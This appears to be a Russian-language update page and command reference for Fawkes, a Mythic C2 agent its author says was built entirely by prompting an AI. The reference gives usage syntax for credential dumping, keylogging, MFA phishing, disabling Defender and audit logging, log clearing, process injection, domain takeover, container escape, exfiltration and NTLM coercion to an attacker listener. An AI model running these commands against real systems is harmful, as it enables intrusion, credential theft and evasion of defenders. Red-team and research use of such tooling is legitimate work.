Назад к обновлениям
UpdatedJul 25, 2026

fawkes — Updated!

Fawkes — это golang Mythic C2 агент, написанный исключительно ИИ.

Поделиться

Fawkes Mythic C2 Agent

Fawkes — это целиком созданный с помощью vibe-кодирования агент Mythic C2. Это началось как «интересно», а превратилось в цель. Моя цель — не написать ни строчки кода для этого агента, а исключительно создавать его с помощью промптов.

Изначально я пытался написать агента сам, но после клонирования примера контейнера, чтения документации Mythic, просмотра видео серии разработчика на YouTube и копирования кода из других агентов, таких как Merlin или Freyja, я решил, что у меня просто нет времени на разработку собственного агента. А вот для промптов время у меня есть.

Fawkes — это агент на Golang с кроссплатформенными возможностями. Он поддерживает Windows (EXE, DLL и шеллкод), Linux (ELF-бинарники и разделяемые библиотеки) и macOS (Mach-O-бинарники для Intel и Apple Silicon). Всего 213 команд: 113 кроссплатформенных, 82 только для Windows, 21 только для Unix, 11 только для Linux и 6 только для macOS (некоторые команды имеют платформозависимые реализации, объединённые одним пользовательским именем, например screenshot). Поддерживает HTTP-исходящие соединения и TCP-соединения peer-to-peer (P2P) для внутреннего перемещения.

Установка

Чтобы установить Fawkes, вам потребуется Mythic, установленный на удалённом компьютере. Инструкции по установке Mythic можно найти на странице проекта Mythic.

Из каталога установки Mythic:``` ./mythic-cli install github https://github.com/galoryber/fawkes

## Краткий справочник командCommand | Syntax | Description
------- | ------ | -----------
acl-edit | `acl-edit -action read -server dc01 -target user` | Чтение/изменение DACL объектов Active Directory (добавление/удаление ACE, предоставление DCSync, GenericAll, резервное копирование/восстановление). Кроссплатформенный (T1222.001, T1098, T1003.006).
adcs | `adcs -action <cas\|templates\|find\|request\|auto-exploit> -server <DC> -username <user@domain> -password <pass> [-ca_name <CA>] [-template <name>] [-alt_name <UPN>]` | Перебор служб сертификации AD, поиск уязвимых шаблонов (ESC1-ESC4, ESC6 через DCOM), запрос сертификатов через DCOM для эксплуатации ESC1/ESC6 или автоэксплуатация (цепочка find → parse → request). Кроссплатформенный (T1649).
ads | `ads -action <write\|read\|list\|delete> -file <path> [-stream <name>] [-data <content>] [-hex true]` | **(Только Windows)** Управление альтернативными потоками данных NTFS — запись, чтение, вывод списка или удаление скрытых потоков данных. Поддерживает текст и шестнадцатеричные двоичные данные. MITRE T1564.004.
amcache | `amcache -action <query\|search\|delete\|clear> [-name <pattern>] [-count <n>]` | Запрос и очистка артефактов выполнения для криминалистики. Windows: Shimcache. Linux: recently-used.xbel, эскизы, Tracker. macOS: недавние элементы, KnowledgeC, карантин (T1070.004).
apc-injection | `apc-injection [-method <apc\|hwbp>] -pid <PID> [-tid <TID>] [-target_api ntdll!NtDelayExecution] [-timeout_ms 30000]` | **(Только Windows)** Внедрение в удаленный процесс. `-method apc` (по умолчанию) ставит шелл-код в очередь через NtQueueApcThread в поток, находящийся в состоянии ожидания (используйте `ts` для поиска такого). `-method hwbp` присоединяется через DebugActiveProcess, устанавливает аппаратную точку останова DR0 на целевом API (по умолчанию `ntdll!NtDelayExecution`) и перенаправляет Rip на шелл-код при срабатывании точки останова — не требует TID, очереди APC или CreateRemoteThread (T1055.004, T1055).
audio-capture | `audio-capture [-duration 10] [-sample_rate 16000] [-channels 1] [-device default]` | Запись звука с микрофона и загрузка WAV-файла. Windows (waveIn), Linux (arecord/parecord), macOS (rec/ffmpeg). Кроссплатформенный (T1123).
auditpol | `auditpol -action <query\|disable\|enable\|stealth> [-category <name\|all>]` | **(Только Windows)** Запрос и изменение политик аудита Windows. Отключение журналирования событий безопасности перед чувствительными операциями. Режим Stealth отключает подкатегории, критически важные для обнаружения. Использует API AuditQuerySystemPolicy (T1562.002).
argue | `argue -command "cmd.exe /c whoami" -spoof "cmd.exe /c echo hello"` | **(Только Windows)** Выполнение команды с подменой аргументов процесса. Обходит Sysmon Event ID 1 и телеметрию командной строки EDR (T1564.010).
arp | `arp [-ip <subnet>]` or `arp -action spoof -target <IP> -gateway <IP>` | Отображение ARP-таблицы с фильтрацией или отравление ARP-кэша для позиционирования MITM (T1557.002). Spoof: только Linux, восстанавливается при очистке.
asrep-roast | `asrep-roast -server <DC> -username <user@domain> -password <pass> [-account <target>]` | Запрос билетов AS-REP для учетных записей без предварительной аутентификации и извлечение хэшей в формате hashcat для офлайн-взлома. Автоматически перечисляет через LDAP. Кроссплатформенный (T1558.004).
av-detect | `av-detect [-deep true]` | Обнаружение установленных продуктов AV/EDR/безопасности путем сканирования запущенных процессов по базе из 130+ сигнатур. С `--deep` также проверяет модули ядра, модули systemd и каталоги конфигурации на предмет установленных, но не запущенных продуктов (Linux). Сообщает о продукте, вендоре, типе и PID. Кроссплатформенный.
autopatch | `autopatch <dll_name> <function_name> <num_bytes>` | **(Только Windows)** Автоматическое патчинг функции путем перехода к ближайшей инструкции возврата (C3). Полезно для обхода AMSI/ETW.
base64 | `base64 -action <encode\|decode\|xor\|hex\|hex-decode\|rot13\|url\|url-decode\|caesar> -input <data> [-key <key>] [-shift <N>] [-file true] [-output <path>]` | Набор инструментов кодирования данных: base64, XOR (с строковым/шестнадцатеричным ключом), hex, ROT13, URL-процентное кодирование, шифр Цезаря. Все поддерживают ввод/вывод файлов. Кроссплатформенный (T1132.001, T1140, T1027).
bits | `bits -action <list\|create\|persist\|cancel\|suspend\|resume\|complete> [-name <job>] [-url <URL>] [-path <local>] [-command <exe>]` | **(Только Windows)** Управление заданиями передачи BITS для персистентности и скрытой загрузки файлов. Создание, приостановка, возобновление, завершение заданий и установка команд уведомления для персистентности. Задания переживают перезагрузки (T1197).
browser | `browser [-action <passwords\|cookies\|history\|autofill\|bookmarks\|downloads>] [-browser <all\|chrome\|edge\|chromium\|firefox>]` | Сбор данных браузера из Chromium, Firefox и Safari. История, автозаполнение, закладки, загрузки — кроссплатформенно. Пароли: Chromium (DPAPI/Keychain/GNOME Keyring), Firefox (расшифровка NSS key4.db), Safari (связка ключей macOS). Куки Firefox на всех платформах. MITRE T1555.003, T1217.
cat | `cat <file>` или `cat -path <file> -start N -end N -number true` | Отображение содержимого файла с опциональным диапазоном строк, нумерацией и защитой от файлов размером >5MB.
cd | `cd <directory>` | Изменить текущий рабочий каталог.
chmod | `chmod -path <file> -mode <permissions> [-recursive true]` | Изменение разрешений файла/каталога с восьмеричной (755, 644) или символьной (+x, u+rw, go-w) нотацией. Рекурсивная поддержка. Кроссплатформенный (T1222).
chown | `chown -path <file> -owner <user> [-group <group>] [-recursive true]` | **(Только Linux/macOS)** Изменение владельца файла/каталога по имени пользователя/UID и группе/GID. Рекурсивная поддержка (T1222).
cert-check | `cert-check -host <hostname> [-port 443] [-timeout 10]` | Проверка TLS-сертификатов на удаленных хостах — определяет центры сертификации, самоподписанные сертификаты, срок действия, SAN, версию TLS, наборы шифров и отпечатки SHA256. Кроссплатформенный (T1590.001).
certstore | `certstore -action <list\|find> [-store <MY\|ROOT\|CA\|Trust\|TrustedPeople>] [-filter <substring>]` | **(Только Windows)** Перечисление хранилищ сертификатов Windows для поиска сертификатов подписи кода, аутентификации клиента и закрытых ключей. Поиск в CurrentUser и LocalMachine. MITRE T1552.004, T1649.
clipboard | `clipboard -action <read\|write\|monitor\|dump\|stop> [-data "text"] [-interval 3]` | Чтение/запись буфера обмена или непрерывный мониторинг изменений с обнаружением шаблонов учетных данных. Кроссплатформенный (T1115).
cloud-metadata | `cloud-metadata -action <detect\|creds\|storage\|aws-iam\|azure-graph\|gcp-iam\|aws-s3\|azure-blob\|gcp-gcs\|aws-persist\|azure-persist\|aws-ssm\|azure-keyvault\|gcp-secrets\|...> [-provider <auto\|aws\|azure\|gcp\|do>]` | Облачные метаданные, извлечение учетных данных, перечисление IAM, перечисление хранилищ, персистентность и доступ к хранилищам секретов. storage/aws-s3/azure-blob/gcp-gcs: перечисление корзин/контейнеров с примерами объектов. aws-ssm: Parameter Store SSM с расшифровкой. azure-keyvault: секреты Key Vault через управляемое удостоверение. gcp-secrets: Secret Manager через сервисный аккаунт. aws-persist/azure-persist: создание долгоживущих ключей доступа/регистраций приложений. Автоопределение. IMDSv2. Кроссплатформенный (T1552.005, T1580, T1530, T1098.001).
compress | `compress -action <create\|list\|extract\|stage\|exfil\|stage-exfil\|exfil-https\|exfil-github> -path <path> [-format zip\|tar.gz] [-output <out>] [-pattern *.txt] [-cleanup true]` | Создание, просмотр, извлечение, подготовка или эксфильтрация архивов. Stage шифрует с AES-256-GCM. Exfil передает в Mythic. exfil-https: загрузка по предварительно подписанным URL в S3/Azure/GCS с разбивкой на части, пользовательскими заголовками, джиттером. exfil-github: эксфильтрация через GitHub Contents API. Кроссплатформенный (T1560.001, T1074.001, T1041, T1048, T1567, T1567.001).
coerce | `coerce -server <target> -listener <attacker-ip> [-method petitpotam\|printerbug\|shadowcoerce\|all] -username <user> [-password <pass>] [-hash <NT hash>] [-domain <domain>]` | Принудительная аутентификация NTLM через MS-EFSR (PetitPotam), MS-RPRN (PrinterBug), MS-FSRVP (ShadowCoerce). Заставляет целевой хост аутентифицироваться на слушателе атакующего. Поддержка Pass-the-Hash. Кроссплатформенный (T1187).
config | `config [-action show\|set\|update] [-key sleep\|jitter\|killdate\|working_hours_start\|working_hours_end\|working_days] [-value <val>] [-file <binary>] [-hash <sha256>]` | Просмотр или изменение конфигурации времени выполнения агента или самостоятельное обновление бинарного файла агента. `show`/`set`: сон, джиттер, дата завершения, часы работы. `update`: загрузка новой полезной нагрузки из Mythic, проверка, запуск и завершение текущего агента. Кроссплатформенный (T1105).
container-detect | `container-detect` | Обнаружение среды контейнера и среды выполнения (Docker, K8s, LXC, Podman, WSL). Проверяет векторы побега, такие как Docker-сокеты и сервисные аккаунты K8s. Кроссплатформенный (T1082, T1497.001).
container-escape | `container-escape -action <check\|docker-sock\|cgroup\|nsenter\|mount-host\|k8s-enum\|k8s-secrets\|k8s-rbac\|k8s-nodes\|k8s-etcd\|k8s-deploy\|k8s-exec> [-command '<cmd>'] [-path <ns>\|<ns1,ns2,...>\|*] [-kubeconfig /path/to/config]` | **(Только Linux)** Побег из контейнера + операции с K8s — сокет Docker, cgroup, nsenter, монтирование устройства хоста. K8s: перечисление подов/сервисов, чтение секретов, **k8s-rbac**: проверка ClusterRole/RoleBinding + оценка путей повышения привилегий (крит/предупр/инфо), **k8s-nodes**: поверхность атаки узлов кластера (kubelet/ОС/ядро/CIDR/taints/роли), **k8s-etcd**: обнаружение конечных точек etcd из аргументов pod control-plane + неаутентифицированный зонд `/version` на каждую конечную точку (неаутентифицированное чтение = полная компрометация кластера), развертывание/выполнение подов через API. **Вне кластера**: `-kubeconfig` принимает украденные файлы kubeconfig для доступа к K8s с хостов вне контейнера (аутентификация по токену + сертификату клиента) (T1611, T1610, T1613, T1552.007, T1069.003, T1087.004).
cp | `cp <source> <destination>` | Копировать файл из источника в назначение.
cred-check | `cred-check [-action check\|verify-all] -hosts <IPs/CIDRs> -username <DOMAIN\user> -password <pass> [-hash <NTLM>] [-timeout <seconds>]` | Проверка учетных данных на SMB, WinRM и LDAP на целевых хостах. `verify-all` проверяет все учетные данные из хранилища на обнаруженных хостах параллельно. Кроссплатформенный (T1110.001, T1078).
cred-harvest | `cred-harvest -action <shadow\|cloud\|configs\|history\|windows\|m365-tokens\|browser-live\|all\|dump-all> [-user <username>]` | Сбор учетных данных: теневые хэши (Unix), облачные конфиги (AWS/GCP/Azure/K8s), секреты приложений, сканирование истории оболочки на утекшие пароли/токены/ключи API, история PowerShell + переменные среды + RDP (Windows), токены M365 OAuth/JWT из TokenBroker/Teams/Outlook (Windows), **browser-live**: кража живых куки, localStorage, sessionStorage через Chrome DevTools Protocol (CDP) из запущенных Chrome/Edge. **dump-all**: автоматизированная цепочка подзадач — запускает hashdump + lsa-secrets + cred-harvest все параллельно (Windows). Кроссплатформенный (T1552, T1003.008, T1528, T1539).
credential-prompt | `credential-prompt [-action dialog\|device-code\|mfa-phish] [-title "Authentication Required"] [-message "Enter your credentials..."] [-icon caution]` | Отображение нативного диалога учетных данных, злоупотребление потоком кода устройства OAuth или фишинг кодов MFA. dialog: macOS AppleScript, Windows CredUI, Linux zenity/kdialog. device-code: поток кода устройства Azure AD OAuth для захвата токена. mfa-phish: поддельный диалог проверки MFA для захвата кодов TOTP. Кроссплатформенный (T1056.002, T1621, T1111).
curl | `curl -url <URL> [-method GET\|PUT\|POST] [-file <path>] [-upload raw\|multipart] [-headers '{"K":"V"}'] [-body <data>]` | HTTP-запросы + загрузка файлов (эксфильтрация) (T1567). Загрузка на предварительно подписанные URL S3, SAS Azure, универсальные конечные точки. Кроссплатформенный (T1106, T1567.002).
cut | `cut -path <file> -delimiter <char> -fields <1,3\|1-3\|2-> [-chars <1-10>]` | Извлечение полей или диапазонов символов из строк файла. Пользовательские разделители, спецификации диапазона. Кроссплатформенный (T1083).
credman | `credman [-action <list\|dump\|vault>] [-filter <pattern>]` | Перечисление хранилищ учетных данных платформы. Windows: Credential Manager + Vault (CredEnumerateW, vaultcli.dll). Linux: GNOME Keyring (secret-tool), KDE KWallet, пароли WiFi/VPN NetworkManager, учетные записи GNOME Online. macOS: элементы связки ключей (общие пароли + пароли интернета), пароли WiFi. `list`=метаданные, `dump`=с секретами, `vault`=только Windows. MITRE T1555.004, T1555.001.
defender | `defender -action <status\|exclusions\|add-exclusion\|remove-exclusion\|threats\|enable\|disable> [-type <path\|process\|extension>] [-value <val>]` | **(Только Windows)** Управление Defender — статус, исключения, угрозы, включение/отключение защиты в реальном времени. MITRE T1562.001.
dpapi | `dpapi -action <decrypt\|masterkeys\|chrome-key> [-blob <base64>] [-entropy <base64>]` | **(Только Windows)** Расшифровка BLOB DPAPI (CryptUnprotectData), перечисление главных ключей, извлечение ключа шифрования Chrome/Edge. MITRE T1555.003/T1555.005.
email | `email -action <count\|search\|read\|folders> [-folder <name>] [-query <keyword>] [-index <n>]` | **(Только Windows)** Доступ к почтовому ящику Outlook через COM. Подсчет сообщений, поиск по ключевым словам, чтение по индексу, список папок. MITRE T1114.001.
dcom | `dcom -action <exec\|upload\|exec-staged\|check> -host <target> -command <cmd> [-args <arguments>] [-object mmc20\|shellwindows\|shellbrowser\|wscript\|excel\|outlook]` | **(Только Windows)** Выполнение команд, загрузка файлов или поэтапное выполнение на удаленных хостах через DCOM. `check` проверяет предварительные требования RPC/DCOM. upload: передача файлов через certutil/PowerShell staging. exec-staged: загрузка, затем выполнение с автоочисткой. Шесть COM-объектов. MITRE T1021.003, T1570.
debug-detect | `debug-detect` | Обнаружение подключенных отладчиков, инструментов анализа и инструментации. Windows: IsDebuggerPresent, NtQueryInformationProcess, PEB, регистры DR. Linux: TracerPid, LD_PRELOAD, карты памяти (Frida/Valgrind/sanitizers), VM/песочница, мониторинг eBPF (Falco/Tetragon/Tracee), фреймворк auditd, ptrace scope. macOS: sysctl P_TRACED, DYLD_INSERT_LIBRARIES, обнаружение VM (sysctl), продукты безопасности (EDR/AV), песочница/среда анализа. Все: сканирование процессов отладчика (T1497.001).
dcsync | `dcsync [-action sync\|domain-takeover] -server <DC> -username <user> [-password <pass>] [-hash <NT hash>] [-target <account[,account2]>]` | DCSync — репликация учетных данных AD через DRS без обращения к LSASS. `domain-takeover` запускает kerberoast + asrep-roast + dcsync krbtgt/Administrator параллельно. Кроссплатформенный (T1003.006).
df | `df [-filesystem <device>] [-mount_point <path>] [-fstype <type>]` | Отчет об использовании дискового пространства файловой системы с опциональной фильтрацией по устройству, точке монтирования или типу ФС. Кроссплатформенный (T1082).
diff | `diff -file1 <path> -file2 <path> [-context <n>]` | Сравнение двух файлов и отображение различий в унифицированном формате diff. Алгоритм на основе LCS с настраиваемым количеством строк контекста. Кроссплатформенный (T1083).
dns | `dns -action <resolve\|reverse\|srv\|mx\|ns\|txt\|cname\|all\|dc\|zone-transfer\|wildcard\|exfil\|doh> -target <host> [-server <dns_ip>]` | Перечисление DNS — разрешение хостов, запрос записей, обнаружение DC, передача зоны, обнаружение wildcard, разрешение через DNS-over-HTTPS скрытно, эксфильтрация DNS. Кроссплатформенный (T1018, T1071.004, T1048.001).
du | `du -path <file_or_dir> [-max_depth <n>]` | Отчет об использовании диска для файлов и каталогов. Разбивка размера по подкаталогам, сортировка по наибольшему. Кроссплатформенный (T1083).
drivers | `drivers [-filter <name>]` | Перечисление загруженных драйверов ядра/модулей. Windows: EnumDeviceDrivers, Linux: /proc/modules, macOS: перечисление kext. Кроссплатформенный (T1082).
domain-policy | `domain-policy -action <all\|password\|lockout\|fgpp> -server <DC> -username <user@domain> -password <pass>` | Перечисление политик паролей/блокировки AD и FGPP через LDAP. Рекомендации для безопасного подбора. Кроссплатформенный (T1201).
crontab | `crontab -action <list\|add\|remove> [-entry <cron_line>] [-program <path>] [-schedule <schedule>]` | **(Только Linux/macOS)** Просмотр, добавление или удаление заданий cron для персистентности. Поддерживает сырые записи cron или синтаксис программа+расписание.
download | `download <path>` or `download {"path": "/file", "compress": true}` | Скачать файл или каталог с целевого хоста. Файлы >1MB автоматически сжимаются gzip (настраиваемо). Каталоги автоматически архивируются в zip. Проверка SHA256. Передача частями, интеграция с файловым браузером.
drives | `drives` | Список доступных дисков/томов и смонтированных файловых систем с типом, меткой/устройством и свободным/общим пространством.
enum-tokens | `enum-tokens [-action list\|unique] [-user <filter>]` | **(Только Windows)** Перечисление токенов доступа во всех процессах. `list` показывает PID/пользователь/уровень целостности/сессию для каждого процесса. `unique` группирует по пользователю с количеством процессов. Автоматически включает привилегию SeDebugPrivilege (T1134, T1057).
encrypt | `encrypt -action <encrypt\|decrypt\|encrypt-files\|decrypt-files\|corrupt\|corrupt-files> -path <file_or_glob> [-key <base64key>] [-confirm SIMULATE\|CORRUPT]` | Шифрование/расшифровка AES-256-GCM (T1486) + целевое повреждение файлов (T1565). corrupt: перезапись заголовков файлов случайными данными. Для разрушительных операций требуется подтверждение безопасности.
env | `env [-action <list\|get\|set\|unset>] [-name <VAR>] [-value <val>] [-filter <pattern>]` | Список, получение, установка или удаление переменных среды для процесса агента. Изменения наследуются дочерними процессами. Кроссплатформенный.
env-scan | `env-scan [-pid <PID>] [-filter <pattern>]` | Сканирование переменных среды процесса на утекшие учетные данные, ключи API и секреты. 35+ шаблонов обнаружения для облачных, СУБД, CI/CD и криптовалютных категорий. Linux + macOS (T1057, T1552.001).
etw | `etw -action <sessions\|rules\|agents\|patch\|restore\|blind-all\|...> [-session_name <name>] [-provider <guid\|shorthand>]` | **(Windows, Linux, macOS)** Манипуляция подсистемами аудита/телеметрии. Windows: сессии/провайдеры ETW stop/blind/blind-all/enable/patch/restore. Linux: правила auditd, очистка/ротация journald, конфиг syslog, обнаружение SIEM-агентов. macOS: унифицированное журналирование, обнаружение агентов безопасности. (T1562, T1070.002).
eventlog | `eventlog -action <list\|query\|clear\|info\|enable\|disable> [-channel <name\|unit\|subsystem\|path>] [-event_id <id>] [-filter <xpath\|keyword\|timewindow>] [-count <max>]` | Управление системными журналами событий. Windows: каналы wevtapi.dll. Linux: модули journald и файлы syslog. macOS: унифицированное журналирование (os_log) подсистем/процессов. Список источников, запрос событий, очистка/вакуумирование журналов, получение информации. MITRE T1070.001, T1562.002.
execute-memory | `execute-memory -arguments 'arg1 arg2' -timeout 60` | Выполнение нативного бинарного файла из памяти. Linux: memfd_create (без записи на диск). macOS: временный файл с произвольной подписью ad-hoc. Windows: временный файл с немедленной очисткой. Все платформы удаляют артефакты после выполнения. MITRE T1620.
execute-shellcode | `execute-shellcode [-technique mmap\|memfd] [-encoding none\|xor\|aes] [-key hex]` | Выполнение шелл-кода в текущем процессе. Поддерживает шелл-код, закодированный XOR/AES-256-CTR, с декодированием во время выполнения (T1027). Windows: VirtualAlloc + CreateThread. Linux: mmap (по умолчанию) или memfd_create. macOS: MAP_JIT (ARM64) или mmap. Кроссплатформенный (T1059.006, T1620).
exit | `exit` | Завершить задачу агента.
file-attr | `file-attr -path <file> [-attrs "+hidden,-readonly,+immutable"]` | Получение или установка атрибутов файла — скрытый, только для чтения, системный (Windows); неизменяемый, добавление, nodump (Linux); скрытый, неизменяемый (macOS). Опустите -attrs для просмотра текущих флагов. Кроссплатформенный (T1564.001, T1222).
file-type | `file-type -path <file_or_dir> [-recursive true] [-max_files 100]` | Определение типа файла по магическим байтам (35+ сигнатур). Одиночный файл или сканирование каталога. Обнаруживает исполняемые файлы, архивы, документы, изображения, базы данных, медиа и многое другое. Кроссплатформенный (T1083).
find | `find -pattern <glob> [-path <dir>] [-min_size <bytes>] [-max_size <bytes>] [-newer <min>] [-older <min>] [-type f\|d] [-perm suid\|sgid\|writable\|executable\|<octal>] [-owner <user\|uid>]` | Поиск файлов по имени, размеру, дате, разрешениям или владельцу. Поиск SUID-бинарников, файлов с правами на запись для всех, файлов, принадлежащих конкретным пользователям. Кроссплатформенный (T1083).
find-admin | `find-admin -hosts <targets> -username <user> -password <pass> [-method smb\|winrm\|both] [-hash <NT>] [-action scan\|auto-move] [-lateral_method psexec\|wmi] [-lateral_command <cmd>]` | Сканирование хостов для обнаружения, где учетные данные имеют права администратора через SMB (общая папка C$) и/или WinRM. **auto-move**: автоматизированная цепочка подзадач — найти административные хосты, затем переместиться латерально к каждому через psexec/wmi. Поддерживает CIDR, диапазоны IP, PTH, параллельное сканирование (T1021.002, T1021.006).
firewall | `firewall -action <list\|add\|delete\|enable\|disable\|status\|pf-add\|pf-delete\|pf-list> [-name <rule>] [-direction <in\|out>] [-protocol <tcp\|udp\|any>] [-port <port>]` | **(Windows, macOS, Linux)** Управление правилами брандмауэра. Windows: COM API. macOS: ALF + привязанные правила pf. Linux: iptables/nftables (автоматически обнаруживается). Поддержка привязок PF для фильтрации пакетов macOS. MITRE T1562.004.
getprivs | `getprivs -action list\|enable\|disable\|strip [-privilege <name>]` | **(Windows, macOS, Linux)** Список привилегий/возможностей. Windows: привилегии токена с возможностью включения/отключения/удаления. Linux: возможности процесса (CapEff/CapPrm) + контекст SELinux/AppArmor. macOS: права, песочница, группы (T1134.002).
getsystem | `getsystem [-technique steal\|potato\|check\|sudo\|osascript]` | **(Windows, Linux, macOS)** Повышение привилегий. Windows: SYSTEM через кражу токена или DCOM potato. Linux: проверка векторов повышения (SUID, sudo, возможности, docker) или попытка повышения через sudo. macOS: проверка векторов, sudo или запрос прав администратора через osascript (T1134, T1548).
gpp-password | `gpp-password -server <DC> -username <user@domain> -password <pass>` | Поиск в SYSVOL XML-файлов GPP с зашифрованными атрибутами cpassword и расшифровка с использованием опубликованного ключа AES (MS14-025). Кроссплатформенный через SMB (T1552.006).
gpo | `gpo -action <list\|links\|find\|all> -server <DC> -username <user@domain> -password <pass> [-filter <name>]` | Перечисление объектов групповой политики через LDAP — список GPO, карта связей с принудительным применением, поиск интересных настроек CSE. Кроссплатформенный (T1615).
grep | `grep -pattern <regex> [-path <dir>] [-extensions .txt,.xml] [-ignore_case] [-max_results 100]` | Поиск содержимого файлов по регулярным выражениям. Рекурсивный поиск по каталогам с фильтрацией расширений, строками контекста и пропуском бинарных файлов. Кроссплатформенный (T1083, T1552.001).
hash | `hash -path <file_or_dir> [-algorithm md5\|sha1\|sha256\|sha512] [-recursive true] [-pattern *.exe] [-max_files 500]` | Вычисление хэшей файлов (MD5, SHA-1, SHA-256, SHA-512). Одиночные файлы или каталоги с фильтрацией по шаблону glob и контролем глубины. Кроссплатформенный (T1083).
hexdump | `hexdump -path <file> [-offset <bytes>] [-length <bytes>]` | Отображение содержимого файла в формате xxd (hex+ASCII). Управление смещением/длиной для просмотра конкретных областей, максимум 4096 байт. Кроссплатформенный (T1005).
handles | `handles -pid <pid> [-type File] [-show_names] [-max_count 500]` | **(Windows, Linux, macOS)** Перечисление открытых дескрипторов/файловых дескрипторов в процессе. Windows: NtQuerySystemInformation. Linux: /proc/pid/fd. macOS: lsof (T1057, T1082).
hashdump | `hashdump [-action dump\|insitu\|insitu-full\|tickets\|auto-spray] [-targets <hosts>] [-format json]` | **(Windows, Linux, macOS)** Извлечение хэшей паролей локальных учетных записей. Windows: хэши NTLM из раздела реестра SAM (требуется SYSTEM); **insitu**: перечисление активных сеансов входа через внутрипроцессные API LSA (требуется администратор); **insitu-full**: открытие lsass.exe с PROCESS_VM_READ, сигнатурное сканирование lsasrv.dll для поиска LogonSessionList, обход связного списка, наложение структуры KIWI_MSV1_0_LIST_63 на каждый узел для извлечения LUID/UserName/Domain/AuthPackage/LogonType/Credentials-pointer, обход цепочки учетных данных для каждого поставщика аутентификации по credentials_ptr для захвата каждой оболочки KIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC, сигнатурное сканирование LsaInitializeProtectedMemory_Internal для восстановления глобальных переменных BCrypt ключей IV / h3DesKey / hAesKey, а также сырых 16-байтового IV / 24-байтового 3DES / 32-байтового ключа AES, расшифровка AES-256-CFB / 3DES-CBC каждого захваченного зашифрованного BLOB (выбор BLOB по `len % 8`), и наложение структуры KIWI_MSV1_0_PRIMARY_CREDENTIAL_10_NEW для извлечения хэшей NT/LM/SHA — вывод в формате `username:rid:lm:nt:::`, совместимом с хуком credential-vault действия dump-action ProcessResponse (Phase 2B + 2C-i + 2C-ii-a + 2C-ii-b + 2C-ii-c, Win10 21H2 — Win11 23H2, требуется администратор). Linux: хэши из /etc/shadow с определением типа хэша (требуется root). macOS: хэши PBKDF2 Directory Services из plist-файлов пользователей (требуется root). **auto-spray**: извлечение хэшей, затем автоматический перебор через cred-check по целевым хостам. MITRE T1003.002, T1003.008.
history-scrub | `history-scrub [-action list\|clear\|clear-all] [-user <username>]` | Просмотр или очистка файлов истории команд оболочки/приложений. Охватывает bash, zsh, fish, PowerShell, python, mysql и другие. Кроссплатформенный (T1070.003).
hollow | `hollow -filename <shellcode> [-target <process>] [-ppid <pid>] [-block_dlls true]` | Вытеснение процесса — создание приостановленного процесса, запись шелл-кода, перенаправление выполнения. **Windows:** CREATE_SUSPENDED + SetThreadContext, подмена PPID, блокировка DLL, украшение PEB (маскировка ImagePath/CommandLine/WindowTitle). **Linux (amd64/arm64):** запись PTRACE_TRACEME + /proc/mem. **macOS:** ptrace + Mach VM API (task_for_pid, mach_vm_allocate, mach_vm_write, mach_vm_protect) — требуется root. MITRE T1055.012, T1036.
ide-recon | `ide-recon -action <vscode\|jetbrains\|all> [-user <filter>]` | Перечисление конфигураций IDE — расширения VS Code, удаленные SSH-хосты, недавние проекты, настройки с секретами. Источники данных JetBrains, серверы развертывания, недавние проекты. Кроссплатформенный (T1005, T1083).
ifconfig | `ifconfig` | Список сетевых интерфейсов с адресами, MAC, MTU и флагами. Кроссплатформенный (Windows/Linux/macOS).
inline-assembly | `inline-assembly` | **(Только Windows)** Выполнение сборки .NET в памяти с использованием CLR. Поддерживает аргументы командной строки. Сначала используйте `start-clr` для рабочего процесса с патчем AMSI.
inline-execute | `inline-execute` | **(Только Windows)** Выполнение BOF/COFF в памяти. Поддерживает все типы аргументов: строки (z), широкие строки (Z), целые числа (i), short (s) и бинарные (b).
reflective-load | `reflective-load -dll_b64 <base64_dll> [-function <export>]` | **(Только Windows)** Загрузка нативного PE (DLL) из памяти в текущий процесс. Ручное отображение PE с копированием секций, исправлением перемещений, разрешением импорта и вызовом DllMain. Опционально вызывает экспортируемые функции (T1620).
iptables | `iptables -action <status\|rules\|nat\|add\|delete\|flush> [-rule <args>] [-table <name>]` | **(Только Linux)** Перечисление и управление брандмауэром Linux через iptables/nftables/ufw. IP-форвардинг, отслеживание соединений, просмотр и изменение правил. MITRE T1562.004.
jobkill | `jobkill -id <task-uuid>` | Остановка запущенной задачи по ID задачи. Используйте `jobs` для просмотра запущенных задач. Кроссплатформенный.
jobs | `jobs` | Список запущенных в данный момент задач с ID задачи, именем команды и длительностью. Кроссплатформенный.
jxa | `jxa -code '<script>' [-timeout 60]` или `jxa -file /path/to/script.js` | **(Только macOS)** Выполнение сценариев JavaScript for Automation (JXA) с доступом к мосту ObjC к фреймворкам Foundation, AppKit, Security. Поддерживает встроенный код и ввод из файла (T1059.007).
kerberoast | `kerberoast -server <DC> -username <user@domain> -password <pass> [-spn <SPN>]` | Запрос билетов TGS для SPN-учетных записей и извлечение хэшей в формате hashcat для офлайн-взлома. Автоматически перечисляет через LDAP. Кроссплатформенный (T1558.003).
klist | `klist -action <list\|purge\|dump\|import> [-server <filter>] [-ticket <base64>] [-path <path>]` | Перечисление, дамп, очистка и импорт билетов Kerberos. Импорт включает Pass-the-Ticket: Windows внедряет kirbi через LSA, Linux/macOS записывает ccache и устанавливает KRB5CCNAME. Кроссплатформенный (T1558, T1550.003).
keychain | `keychain -action <list\|dump\|find-password\|find-internet\|find-cert> [-service <name>] [-server <host>]` | **(Только macOS)** Доступ к связке ключей macOS — список связок, дамп метаданных, поиск общих/интернет-паролей, перечисление сертификатов.
kerb-delegation | `kerb-delegation -action <all\|unconstrained\|constrained\|rbcd\|monitor> -server <DC> -username <user@domain> -password <pass> [-duration <s>] [-interval <s>]` | Перечисление отношений делегирования Kerberos — неограниченное, ограниченное (с переходом по протоколу), RBCD. Действие **monitor** (Windows/SYSTEM только) опрашивает LSA на предмет входящих TGT и экспортирует их как BLOB kirbi. Кроссплатформенный, кроме monitor (T1550.003, T1558).
keylog | `keylog -action <start\|stop\|dump\|status\|clear>` | Низкоуровневый клавиатурный кейлоггер. Windows: SetWindowsHookEx. Linux: /dev/input evdev. macOS: IOKit HID. Обнаруживает события вставки Ctrl+V/Cmd+V и захватывает содержимое буфера обмена. Отслеживание контекста окна на всех платформах (T1056.001).
lateral-check | `lateral-check -hosts <IPs/CIDRs> [-timeout <seconds>]` | Проверка возможностей латерального перемещения против целей — проверяет SMB, WinRM, RDP, RPC, SSH-подключение и предлагает применимые методы. Кроссплатформенный (T1046, T1021).
